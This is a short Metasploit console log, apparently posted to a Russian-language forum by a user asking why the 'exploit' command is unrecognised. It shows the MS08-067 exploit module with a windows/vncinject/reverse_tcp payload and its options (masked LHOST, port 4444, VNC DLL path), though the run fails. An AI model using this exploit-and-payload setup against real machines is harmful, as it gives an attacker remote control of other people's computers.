msf exploit(ms08_067_netapi) > use windows/vncinject/reverse_tcp
msf payload(reverse_tcp) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOVNC true yes Automatically launch VNC viewer if present
DLL /home/master/progs/framework-3.2/data/vncdll.dll yes The local path to the VNC DLL to upload
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST ххх.ххх.хх.ххх yes The local address
LPORT 4444 yes The local port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy
msf payload(reverse_tcp) > exploit
[-] Unknown command: exploit. <----- ЭТО КАК ПОНИМАТЬ?
msf payload(reverse_tcp) >